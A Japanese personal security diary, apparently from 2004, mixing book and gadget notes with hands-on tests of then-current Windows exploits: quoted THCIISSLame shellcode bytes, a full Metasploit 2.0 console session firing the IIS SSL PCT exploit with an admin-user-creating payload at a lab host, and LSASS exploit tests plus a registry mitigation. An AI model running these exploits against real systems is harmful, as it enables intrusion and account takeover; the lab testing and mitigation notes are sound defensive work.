けんのぼやき

1 [Book] スティーリング・ザ・ネットワーク

スティーリング・ザ・ネットワーク—いかにしてネットワークは侵入されるか<-4/1 12:30までリンク先間違えてましたm(_ _)m
面白そうだなぁ。いつ発刊なんだろうと思ったら、もう発刊しているのか(^^; id:sonodamさんとこから。

2 続・ICMPのフィルタリングの戯言

お言葉をいただいて思い出した(汗、マスタリングTCP/IP応用編とTCP/IPセキュリティを眺めたり、考えたりしてみた。icmpさんからいただいコメントは参考にICMPのフィルタリングとして、こんなのどうだ！？というお言葉と解釈したので、それを起点にちょっと書いてみる。みなさま遠くからも含めて(笑 コメントありがとうございました。

• $fwcmd add allow icmp from ${oip} to any icmptype 3,4,8,11,12
• $fwcmd add allow icmp from any to ${oip} icmptype 0,3,4,11,12

許可するものとして自分を起点にout方向はICMPのtypeが3,4,8,11,12。in方向はICMPのtypeが0,3,4,11,12という感じ。

• out方向
  • type3 宛先到達不通知(Destination Unreachable)
  • type4 発信抑制(Source Quench)
  • type8 エコー要求(Echo Request)
  • type11 データグラムの時間超過(Time Exceeded for Datagram)
  • type12 データグラムのパラメータ異常(Parameter Problem on Datagram)
• in方向
  • type0 エコー応答(Echo Reply)
  • type3 宛先到達不通知(Destination Unreachable)
  • type4 発信抑制(Source Quench)
  • type11 データグラムの時間超過(Time Exceeded for Datagram)
  • type12 データグラムのパラメータ異常(Parameter Problem on Datagram)

out方向とin方向の違いは細かいことを気にせずに簡単に言ってしまうと、自分はpingを使えるけど、pingの応答は返さないという具合。out方向とin方向で共通に言える事を順に見る。

宛先到達不通知は読んで文字の如し。例えば

• ping応答でもたまに目にすることもあるような経路の途中のルータとかが応答を返す ICMP Destination Unreachable / Net Unreachable (type3 code0)とかICMP Destination Unreachable / Host Unreachable(type3 code1)。
• UDPポートに接続できなかったり、UDPポートスキャンのOpen,Close判定で利用されたりと、一部の人にはこれが重要に感じてたりすることも多い(笑 ICMP Destination Unreachable / Port Unreachable (type3 code2)。
• RFC2979とかでもブロックしてはならないとまで書かれてる、Path MTU Discovery関連の話題で、簡単に言ってしまえばMTUのサイズが大きいので小さくしろと言って、それを受け取って解釈できればMTUのサイズを小さくして通信が行えるという具合の話のなかで使用されたりする ICMP Destination Unreachable / Fragmentation Needed and DF Set (type3 code4)。ダメなルータの場合等は自分でMTUのサイズを調整しないと通信で障害が残るので、ちょっと詳しくて頼られちゃう人はこの手のトラブルでウンザリしている可能性もある。
• いけないことを想像して、IP Source Routeを指定しパケットを送信してみたなど、そんな某かのテストで出会ったこともあるかもしれないのが、ICMP Destination Unreachable / Source Route Failed (type3 code5)。

とかいった具合で、codeは15まで続くわけだ。ちゃんとフィルタリングを考えてやろうとすると、Destination Unreachableのcode毎にin方向とout方向を考えてフィルタリングかと。というか、そこまで可能なフィルタリング機構を備えた奴は少なくなかったりするかも。WindowsだとCHX-Iとかできた気がするな。

輻輳してパケット捨てちゃいましたと送られてくるのが発信抑制(Source Quench)。メッセージを受け取って期待される処理は、転送速度を下げる。転送速度上げていいよメッセージがあるわけではないので、発信抑制が送られてこなかったら、だんだんと転送速度を上げるらしい。そんな実装がちゃんとなっているのか、調べた方がいるみたい。でも、ちょっとドキュメント的には古い。けれど興味深い。ICMP Source Quench パケット処理の実装に関する実験(Dec 1996)

データグラムの時間超過はtracerouteで頻繁に接する機会が多い。tracerouteはTTLの値を１から順に増やしていって、経路を調べたりするものに使用しするが、まさにそのTTLが0の時にこのメッセージを送信元に返す。

データグラムのパラメータ異常は具体的なシチュエーションが思い浮かばない。想像してみると妙なIPヘッダのパラメータを送ることで、わざとこのメッセージを遅らせることで、fingerprintに使うこととかあるのかなぁ。というか、そいうのを期待して許可するものでは決してない(^^;;; 調べてみないと分からないことだけど、OSで特徴が現れるということはなさそう気はする(まだ言うか XprobeではICMP unreachable test,ICMP echo request/reply test,ICMP timestamp request,ICMP information request,ICMP address mask requestあたりをテストしているみたい。

で、思うんですけど、やっぱりICMPってtypeの説明やcodeの説明はどこかしこにコピーしたかのような情報はたくさん見かけるけど、結局このtypeのICMPメッセージは末端の端末には影響なくて、経路上のルータで使うようなものだけど、今どきはこれ自体も使わずに違うプロトコル使ってるんだよとか、このtypeのICMPメッセージは一見 末端の端末で意味をなさないように見えるけど、実はこういう時にこういう使いかたしていると、すげーいいんだよ。といった、実際のネットワークに密着したネットワーク構成のどの部分では、どうでこうだみたいなICMPの話がどこかで読めるといいなぁと妄想した、１日でした。そうそうHTTPプロトコルみたいな本で、ICMPプロトコルなんて本があったらないいなぁ(^^;

3 昨日

の日中は打ち合わせと課内庶務で１日が終わってしまって、年度末最後にちょっと悲しかった。

4 うちの会社

ウイルスをゲートウェイで検出した後に、Fromに対してその旨のメールを送るのやめてくれませんかね…

1 [Book] サーバー防衛大學校

サーバー防衛大學校
たりきさんの本がついに出るそうです。某所等々を見てたら、厳しい道のりだったぽくて、お疲れ様でした。コピペ、コピペで書いていて、気づいたら思わず呼び捨てでした(汗 m(_ _)m 最近は他力本願堂本舗さんと書くと、サイト名にさん付けしている感覚で仕方がない今日この頃と言い訳してみる(汗 あ、でもサイト名はたぬきん本舗(狸本願堂本舗)か(笑

2 個人情報の保護(東京都)

の、事業者が保有する個人情報の適正な取扱いに関する指針には、

６　自己情報の開示等
（１）本人から自己情報の開示を求められたときは、原則として、
これに応ずるものとする。

な話が掲載されていることを聞いた。同じく情報公開・個人情報保護審議会というのが開催されていて、議事録とかも公開されているみたいだから、後で呼んでみようと思って放置中。

3 現状

巡回してないし、メールも見ていないという状況です(汗

HTTP_REFERERなネタはワタシもファンだったりしてます(笑

花見といえば、土曜日はワタシも相方と近所の桜密集地帯＋桜並木を２時間半かけて鑑賞した。近所の川には野鳥が6,7種類ほどいて驚いたりと発見が多かったり。

1 [link] Vulnerability Tutorials(saintcorporation.com)

• CVE Cross Reference(saintcorporation.com)

脆弱性の情報を追って毎日のように公開しているサイトって、英語圏だとかなりの数にのぼるような気がするが、SAINTのサイトにもそのようなコンテンツがあるのを知った。適当にみた感じだとちゃんと追ってる感じ。

あえて、調べたり情報収集で、ここを使うという理由は見つけにくいけど(^^; CVEの方はちょっと面白いかな。

2 サン・コバルト・サポート・サービス

『Sun Cobalt製品のEOSL(End Of Service Life:サービス終了)についてのお知らせ』というのが目に付いたのでメモっておく。

3 日本沈没地図

この手のサイトは一瞬面白い！と思うけど、楽しさを継続できないんだよな。ワタシが飽きっぽいから、普通の人は総じてそうなのかは分からないなり。

笑門来福より。

4 まったり

日記は１ヶ月くらいまったりな更新が継続するかもしれない。更新が怒涛ったら、何かから逃げていると思ってください(笑

あ、超多忙というワケではないです。

1 [Book] Ｓｎｏｒｔ ２．０ 侵入検知

ちっともAmazonに登場しない(^^; Snort2.0侵入検知がついに4月7日の本日付で発刊予定。発刊予定日に本屋に行って買えたためしがないので、週末あたりが狙い目か！？(笑

ちなみにSnort2.0と言っても、目次を見ると

Snort 2.1.0で追加されたルールオプション

と書かれてます。

個人的にはプリプロセッサとアウトプットプラグインが気になります。

2 [link] WWW.HACKCOZA.COM

tessyさんとこから。

気づくと復活するシステムはどーなってるのだ？(^^;

3 うぇぶんるい

が更新されたそうなので、ほぼ昨日段階の状態でやってみた。

String Length: 3787 byte
Language :Japanese euc-jp
Checked Language: Japanese
Title: けんのほやほや
Category: :0 :0

健全というか、つまらないというか…

4 なんでも酒や カクヤス

キャッチフレーズが

３６５日年中無休ビール一本でも２時間枠で無料で配達！

スゴイ。チェーン店で会社の近所にもあるみたいだ。

5 いろいろ

• 魔法も使えるように？大学で「エルフ語」講座(ZAKZAK)
  • なんとなく、授業をうけてみたい。

• 本日のアニメ
  • 修羅の刻、MONSTER、攻殻機動隊。アニメといえばガンダムSEEDの後番の鋼の錬金術師が面白い。修羅の刻は微妙に期待値を超えてくれてなかった。次は修羅の門のテレビアニメ化を是非。

• DVDレコーダー
  • 結局、RD-X4＋機能拡張キットにしようと思う。ナニゲにPSXも捨てがたかったり、松下の新機種や、動きがでそうな夏モデルも気になるんだけど。ヨドバシカメラ ハードディスク容量で選ぶＤＶＤレコーダー を見るとPSXが人気みたいだ。

6 マウス

の左クリックの反応がすこぶる悪い。使い物にならん…

7 年度末

頃に遡ってゆるりと巡回中です。

1 [Book] グーグる！ Googleで知識が100倍増える本

例のGoogle超活用法・アイデアコンテスト！がぐっと詰まった、グーグる！ Googleで知識が100倍増える本。目次を見ると結構面白そうですよ。しかし、この広告でかいなぁ(笑

2 いろいろ

• 「やられた！」と思った時の適切な事後対策
  • 日経ネットワークセキュリティ2003に掲載されていた渡辺勝弘さんの記事。

• 「インターネットにおける個人情報保護と人権」セミナー
  • 資料が一式公開されたようです。ろらんさんとこから。

• 早稲田大学で年度末に開催されたWriting Secure Code関連
  • 「まだ誰も手がけていない分野に先に進出」 MS古川氏が学生に望む姿
  • セキュアなコードの書き方 - セキュアな設計が最も重要

3 発信者情報開示請求事件

そういえば、「インターネットにおける個人情報保護と人権」セミナーで、WinMX絡みのTBCの個人情報漏洩で、プロバイダー責任制限法に基づいて発信者が開示された判決がでたけど、あまり話題になっていないなぁと言っていたのはこれのことなのかな。小倉弁護士だったのね。

ちょっと話がずれるが、Internet Week 2003 の管理者が注意したいネットワークの法律の最新動向2003(岡村弁護士)もメモしておこう。

4 origami KAIJU

webhunter2より。

1 スパム

port139の勉強会受付番号のメールがスパムのフォルダに自動振分されてしまったのは内緒だ(汗

X-Mailerで乱暴にフィルタリングした結果なのだ(汗

2 ちょっと

いっぱいいっぱい。

Matrixは迷惑な鼾をかいて半分以上寝てしまったり、仕事は仕事でちょっと想定外な引継内容だったり、帰りの電車で椅子に座って寝ていたら網棚から荷物が落下して脳天に直撃したり、10時から予約開始のとあるお得な宿に11時に電話が繋がったが既にイッパイイッパイだったりと、日々の回転がうまいこといってません。

1 [Book] セキュアプログラミング—失敗から学ぶ設計・実装・運用・管理

オライリーの解説を見ていたら、セキュアプログラミングを実践する際に注意すべきポイントを、アーキテクチャ、設計、実装、テスト、運用という開発プロジェクトのライフサイクルに沿って示します。とか、技術者のみならず学生から経営者まですべの人に読んでほしい一冊です。とか書かれているところを見ると、読み手を選ばなそうな、ちょっと気になる本という感じ。目次を見てもそんな感じ。

今週末あたりの書店で要チェックなのかな。

Amazonにまだないなぁ。

xcorpさんとこ経由で、知ったわけだったのですが、これはバナーというのかしら？(笑

[追記] バナーをいただいたので期間限定ではってみた(笑

そいえばntohさんとこにも写っていた、{{isbn("4883731618","ネットワーク攻撃詳解—攻撃のメカニズムから理解するセキュリティ対策")]]をふと再読しはじめているのは内緒だ。Amazonにリンクしたけど"現在、在庫切れです。"となっていたのも内緒だ(^^;

2 Bフレッツ

とかを使ってみたのですが、事情で10Mのハブとか使ってACCAのADSLつなげたり、その状態(正確な状態を指していないが)でフレッツスクェアにつなげて頭文字Dを見たり、NTT東日本の東京支店管内で見ることができる、宇宙戦艦ヤマト・キャプテン・人造人間キカイダー・新造人間キャシャーンとか見たりと、だいぶしょうもない事している。

とりあえず手元周辺の問題として、左クリックが機能しないマウスや、唐突におちるOSや、中途半端に短いLANケーブルをまずはどうにかしないと。

3 ケーキオフ

kawaさんにケーキオフは夜もケーキオフに含んでるみたいなこと言われちゃいましたが、今回は土曜日で少林サッカーは気になるけど、新選組は見逃さなくていいので(何 行くつもりでしたが朝から体調悪気味なため欠席で。真っ直ぐ帰ったのに鋼の錬金術師に間に合わなかった(何

そいや12月に風邪でお休みしてから、何だかんだと都合が悪かったりも手伝って、しばらくでてなかったかも。そのお陰で？12月から2kg/月ピッチで減量中。それが影響してか、ちょっと体力が落ち気味。。。

あっちを立てるとこっちが立たずという見本(言葉の使い方間違い…

4 サルサdeスナック

ジャパンフリトレーというとこで作っている210円(税込)のちょっとリッチなお菓子を食べてみた。スナック菓子をインスタントのスパゲティーの具を自分で絡ませて食べるという感覚。試しに１度くらいは食べてみたらどうだろうかという感じ。

5 今月

は巡回しても一瞬見た気がする！で通り過ぎているのだ。黄金週間あたりに、猛烈たまってしまったBloglinesの未読件数をサクっと減らそっと。

1 RTSPのメモ

ちょっとHelix Universal Serverのヘッダを見たかったので。

OPTIONS * RTSP/0.9
OPTIONS * RTSP/1.0
OPTIONS * RTSP/1.1
OPTIONS * RTSP/2.0

話がずれるが、前から気になってるんだけど、Windows Media サービスって、なんで Serverフィールドが Cougar なんだ。

WMSといえば未だにこのあたりの解決方法がワカラン。自分で使っていないから、調査や問い合わせに気合が入らないのだよな。

2 THCIISSLame.exe

寝ようと思った寸前に某所から。ちょっとだけ実行してみた。

とりあえず443/tcpにつながったら、撃ち込むのかな。とりあえずコンパイルされてるexeをそのままだと、greetings_to_microsoftあたりの

"\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

がTHCOWNZIIS!な具合で分かりやすく、そのまま撃ち込んでる感じ。

あとはshellcodeの

\x65\x78\x65\x68\x5c\x63\x6d\x64

あたりが見た目だと分かりやすそうな文字列 exeh\cmd という感じか。

3 メッセ

を起動したまま退社した気がする。

1 [Microsoft] 全国で開催中の無償セキュリティ トレーニングを、4月26日より、オンラインでも提供を開始

会社の後ろの席の人に教えてもらふ。と合図を送ってみるテスツ。

2 [Software] Borland Delphi 6 Personal ダウンロード

土曜日にntohさんから教えてもらった。登録すれば『Delphi 6 Personalでは、商用・業務アプリケーションの開発はできません。』という感じの程度で使える。

結構あるんですね。Windowsなやつで無償でコンパイルできるのって。

3 というか

Delphi 6 Personalをインストールしようしたら、既に死にかけのOSだったため、まともにインストールすらできず、やむなく再インストールを土曜日から始めたため、某メールに気づかず焼肉食べれなかったワナ。

4 Wizard Bible vol.9

4/16に公開されたようだ。

5 Bloglines

のBlogフォルダが4000件を突破していたので巡回開始。。。

6 ロト６

キャリーオーバー 327,385,446円 で、次の抽選は最大で４億だとか。ということで、昼休みに買ってきました。

7 お試しパック

Microsoft の SECURITY SUMMIT 2004 の参加得点として掲げられていた『「 TechNet Plus サブスクリプション 」 より厳選した内容を 3 ヶ月無償で お試しいただけます。』の２ヶ月目の４月分が届いた。Security Updates CD ４月の更新分と、お試しパックVol5 のみで、後者は『TechNet Plus 3ヶ月お試しパック ヘルプファイル』と『Security Summit 2004 : オフライン プレゼンテーション』。なんかお金がかかるばかりのネタなので仕方ないですけど、ちょっと残念な内容。

1 IISのSSLなPCTのアレ

某所でFull-Disclosureで流れていたMetasploit Microsoft IIS SSL PCT Moduleが紹介されていたのので試してみた。

Metasploitって知らないなぁと思ったらぐぐった日本語検索上位でtessyさんとこが。流石っ。

MetasploitというのはUnixなやつと、Cygwinなやつと用意されていて、お手軽にexploitを撃つことができるような代物。

簡単には大人の道具か、ガキのオモチャか?--セキュリティテストツールに賛否(japan.cnet.com)あたりを読んでいただいて、実際に今回のIISのSSLなPCTのアレを打ち込む課程がどのような具合か次にコピペしたものをご覧ください。

ちなみに途中show exploitsで列挙されて出てくるものは１つをのぞいて最初からMetasploit Framework 2.0に含まれるものだ。

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/  v2.0    \/     \/ |__|

+ -- --=[ msfconsole v2.0 [19 exploits - 27 payloads]

msf > show exploits

Metasploit Framework Loaded Exploits
====================================
  apache_chunked_win32       Apache Win32 Chunked Encoding
  blackice_pam_icq           Blackice/RealSecure/Other ISS ICQ Parser Buffer Overflow
  exchange2000_xexch50       Exchange 2000 MS03-46 Heap Overflow
  frontpage_fp30reg_chunked  Frontpage fp30reg.dll Chunked Encoding
  ia_webmail                 IA WebMail 3.x Buffer Overflow
  iis50_nsiislog_post        IIS 5.0 nsiislog.dll POST Overflow
  iis50_printer_overflow     IIS 5.0 Printer Buffer Overflow
  iis50_webdav_ntdll         IIS 5.0 WebDAV ntdll.dll Overflow
  iis5x_ssl_pct              IIS 5.x SSL PCT Overflow
  imail_ldap                 IMail LDAP Service Buffer Overflow
  msrpc_dcom_ms03_026        Microsoft RPC DCOM MSO3-026
  mssql2000_resolution       MSSQL 2000 Resolution Overflow
  poptop_negative_read       PoPToP Negative Read Overflow
  realserver_describe_linux  RealServer Describe Buffer Overflow
  samba_trans2open           Samba trans2open Overflow
  sambar6_search_results     Sambar 6 Search Results Buffer Overflow
  servu_mdtm_overflow        Serv-U FTPD MDTM Overflow
  solaris_sadmind_exec       Solaris sadmind Command Execution
  warftpd_165_pass           War-FTPD 1.65 PASS Overflow


msf > use iis5x_ssl_pct


msf iis5x_ssl_pct > show
msfconsole: show: specify 'options', 'advanced', 'targets', or 'payloads'


msf iis5x_ssl_pct > show options
Exploit Options
===============
  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     443        The target port



msf iis5x_ssl_pct > show advanced
Exploit Options
===============
  Exploit (Msf::Exploit::iis5x_ssl_pct):
  --------------------------------------



msf iis5x_ssl_pct > show targets
Supported Exploit Targets
=========================
   0  Windows 2000 SP4
   1  Windows 2000 SP3
   2  Windows 2000 SP2
   3  Windows 2000 SP1
   4  Windows XP SP0
   5  Windows XP SP1


msf iis5x_ssl_pct > show payloads
Metasploit Framework Usable Payloads
====================================
  winadduser               Create a new user and add to local Administrators group
  winbind                  Listen for connection and spawn a shell
  winbind_stg              Listen for connection and spawn a shell
  winbind_stg_upexec       Listen for connection then upload and exec file
  winexec                  Execute an arbitrary command
  winreverse               Connect back to attacker and spawn a shell
  winreverse_stg           Connect back to attacker and spawn a shell
  winreverse_stg_ie        Listen for connection, send address of GP/LL across,read/exec InlineEgg
  winreverse_stg_upexec    Connect back to attacker and spawn a shell


msf iis5x_ssl_pct > set TARGET 0
TARGET -> 0


msf iis5x_ssl_pct > set PAYLOAD winadduser
PAYLOAD -> winadduser


msf iis5x_ssl_pct(winadduser) > show options
Exploit and Payload Options
===========================
  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     443        The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------

  required    PASS                   The password for this user
  optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  required    USER                   The username to create



msf iis5x_ssl_pct(winadduser) > set RHOST 192.168.0.2
RHOST -> 192.168.0.2


msf iis5x_ssl_pct(winadduser) > set PASS hoge
PASS -> hoge


msf iis5x_ssl_pct(winadduser) > set USER huga
USER -> huga


msf iis5x_ssl_pct(winadduser) > show options
Exploit and Payload Options
===========================
  Exploit:    Name      Default                       Description
  --------    ------    --------------------------    ------------------
  required    RHOST     192.168.0.2    The target address
  required    RPORT     443                           The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------

  required    PASS        hoge       The password for this user
  optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  required    USER        huga       The username to create



msf iis5x_ssl_pct(winadduser) > set
PASS: hoge
PAYLOAD: winadduser
RHOST: 192.168.0.2
TARGET: 0
USER: huga


msf iis5x_ssl_pct(winadduser) > exploit
[*] Attempting to exploit target Windows 2000 SP4
[*] Sending 289 bytes to remote host.
[*] Waiting for a response...

ご覧の通り簡単に撃ち込めてしまいます。

ということでMetasploit Framework 2.0には賛否両論あるようですけど、頑張って欲しいなぁと思った次第。

2 IISのSSLなPCTのアレ

をApache1.3.29(確か)に撃ち込むと次のようなerrorログが。THCとMetasploit Framework 2.0のやつとどちらも同じみたい。そもそも下記エラーの意味するところが分からないのアレですが(笑

[error] mod_ssl: SSL handshake failed (server 192.168.0.2:443, client 192.168.0.3) (OpenSSL library error follows)
[error] OpenSSL: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol [Hint: speaking not SSL to HTTPS port!?]

1 Lsasrv.dllの例のアレ

K-OTikで公開されているexploitをバイナリにしたヤツはNorton AntiVirusでBloodhound.Exploit.8で検出された。４月からいろいろと環境が変わって、テスト環境が整ってないので、テストはしていないのでした。

LACのSNS Spiffy Reviews No.10 Successful Reproduction of MS04-011 "LSASS Vulnerability" on Japanese Environments では日本語環境でも任意のコードが実行されるとのことですので、流れ的にゴールデンウィークあけ辺りにMS04-011の複合型なワーム発生なんて事がありえますので、要注意です。関係ないですが、LACのセキュリティ情報を見ると、連名がぐっときますな(^^;

この問題のオリジナルの発見者:
　Yuji Ukai of eEye Digital Security http://www.eeye.com/
再現者:
　新井 悠 y.arai@lac.co.jp

ちなみにFowndstoneでMS04-011の脆弱性スキャナなLSASS scannerを配布してるようですが、職場で試したらスキャン中に落ちてしまい使い物にならんかった。原因追求していないなり。

↑下の方のLSASS scanner(DSScan v1.00)をご覧くださいm(_ _)m

ちなむに、ここのリンク元の検索の様子やhiro-tさんとこ経由のリンク元から察するに、やけに関心がレベルが高そうなTHCIISSLame.exeはNorton AntiVirusでBloodhound.Exploit.9で検出されてました。そいえば、先日ちょっと話題にしたTHCOWNZIISで検索してくる方がいるのだけど、ぐぐってもほぼここのぽやきしかでてこないって、どいう事よ。

2 DDIポケットのA&B割引

そっち方面は安いのダーというのはotsuneさんとこで経由でAirH"PHONEの料金構成シミュレーション

んで、今回の本題であるA&B割引なんだけど、これ結構微妙だなぁ。プロバイダによってはモバイル用で料金をいくらか徴収するとこもあれば、そもそもそれなりの料金を払っている場合のプロバイダはプロバイダ料金オンリーでサービスを受けられるとこもある。

ちなみにブロードバンドな格安なプロバイダとしてはBB.exciteの500円とか。他にもlivedoor、ASAHIネットとかあるかと思います。

モバイルで接続するのに格安なプロバイダとしてはIIJmioの300円。

例えば自宅でブロードバンドとかのプロバイダを格安なBB.exciteを選択している場合はA&B割引に対応してないので、AirH"つなぎ放題の年契(5,176円)＋IIJmio(315円)のみでAirH"経由でノートPCで繋げても使いたいだけ気にせず使えて電話もできる。

例えば自宅でブロードバンドとかのプロバイダがA&B割引に対応していて追加料金なしで利用できる場合、AirH"つなぎ放題の年契(4,263円)でAirH"経由でノートPCで繋げても使いたいだけ気にせず使えて電話もできる。

つまり安さを追求したい場合は、
　BB.excite 525円＋5,176円＋315円＝6,016円
　A&B割引　 4,263円
なので、その差額の1,753円よりも安くA&B割引が使えるプロバイダを探せばいい。

ただ、長期割引やデータセットとか割引プランもいろいろあるので、そう単純でもないのだけど(笑

つなぎ放題の場合は通話料も安いので携帯電話への電話は10.5円で24秒通話できる(例えばFOMAプラン67の営業区域内と隣接県だと10.5円で22秒くらい？)。

AirH"の安いだけにいろいろと追求できるという感じか。

ちなみに通話だけならDDIポケットだと安心だフォンで工夫して、どこにでもかけれるモードが一番安いのかしらん。

3 100円

の折りたたみ傘が風で骨折しました。今までありがとう。

4 スクリーンセーバー

今日ふと思ったこと。あまりスクリーンセーバーで遊ぶこと少ないんですが、Rip, Rig & PanicさんとこのDefaced ArtをWindows XPのスクリーンセーバー(マイピクチャスライドショー)とかでスライドショーにしたら結構いいかもと思ったので、早速 黄金週間にやってみよっと。

最初は小さい画像を組み合わせて壁紙にしたらどうかと思ったのがほったんだ。

5 LSASS scanner(DSScan v1.00)

A Windows® network admin utility for remotely detecting LSASS vulnerability released
in the MS04-011 bulletin. Allows you to scan multiple IP ranges and send an alert
message to vulnerable systems.

おそらく Windows XPやWindows 2000でチェックする分には支障なく使えるのだと思いました(汗 (こじまさん、RIPさん、tessyさんm(_ _)m)

上の方でチェック中にアプリケーションが落ちてしまうというのがありました。んで、実際にどんな時に落ちるか簡単なレベルですが確認してみた。Windows 2003 Server Standard Edition でチェックすると、チェック対象が Windows XP Proffesional だとLSASS Scanner(DSScan v1.00)が落ちるようです。今ちょっと事情により不自由な環境なんでサンプルが少ないんですが、Windows 2000 Serverが対象の場合はチェックできていました。2003-->XP-->2003でなんか駄目っぽいです。確認したのはここまで。

というか、Windows Server 2003 でやるなとか言われそうです。ごめんなさい(汗

1 Lsasrv.dllの例のアレを防ぐ？

いい加減なこと書いちゃったので、ちょっとは役に立つことをということで、気になっていた部分を簡単に調べた。

K-OTikのexploitをWindows2000SP4とWindowsXPSP1に撃つと、いくつかのところでネタになっているようにWindows2000SP4ではサクっと決まってしまって大変危険だという事がわかったりする。Windows XPSP1では撃ち込んだ方の接続が切れるとlsass.exeのエラーで再起動という具合。

ということでMS04-011を当てなさいとなるわけですが、どこかのGO指令がでないと当てられないなんて事もあるんじゃないかと。

MS04-011で修正された脆弱性は多岐にわたるのでアレですが、とりあえず危険な香りがぷんぷんなLSASSの脆弱性を防ぎたいという場合には、匿名接続の制御でどうにかなるじゃないかと思った。

そもそもLSASSの脆弱性というのはMicrosoftのMS04-011を読むと分かるように、『Windows 2000 および Windows XP のみが匿名ユーザーによってリモートで攻撃される可能性があります。』ということなので、匿名接続を禁止にするとよいのだろうと思った。

ということで伊原さんの匿名接続（NULL接続）に関するメモが登場。

試した結果 Windows 2000 では匿名ユーザーによるログオンの拒否

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
RestrictAnonymous = 2

にすることで、とりあえずK-OTikのexploitについては防げた感じです。(Windows 2000については仕事を終えて帰り際にちょこっとやっただけなので、ちょっと不安だったり(^^;))

RestrictAnonymous = 2ということは、XPでは設定できないので、ダメなのでした。ちゃんちゃん。

というか、これって既に話題になってたりしてたらm(_ _)m あと、そもそも境界境界でパケットフィルタリングせいというワケだが(笑

というか、パッチ当てましょう。